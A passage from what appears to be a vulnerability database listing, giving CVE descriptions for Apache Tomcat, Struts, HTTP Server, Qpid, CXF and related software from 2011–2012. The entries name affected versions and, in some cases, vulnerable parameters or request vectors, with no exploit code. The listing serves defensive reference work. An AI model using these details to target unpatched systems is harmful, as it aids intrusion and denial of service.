10336| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
10337| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
10338| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
10339| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
10340| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
10341| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
10342| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
10343| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
10344| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
10345| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
10346| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
10347| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
10348| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
10349| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10350| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
10351| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
10352| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
10353| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
10354| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
10355| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
10356| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
10357| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
10358| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
10359| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
10360| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
10361| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
10362| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
10363| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha do not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
10364| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
10365| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
10366| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
10367| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
10368| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
10369| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
10370| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
10371| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
10372| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
10373| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
10374| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
10375| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
10376| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
10377| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
10378| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
10379| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
10380| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
10381| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
10382| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
10383| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
10384| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
10385| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
10386| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
10387| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
10388| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
10389| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
10390| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
10391| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
10392| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
10393| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
10394| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
10395| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
10396| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
10397| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
10398| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
10399| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
10400| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
10401| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
10402| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
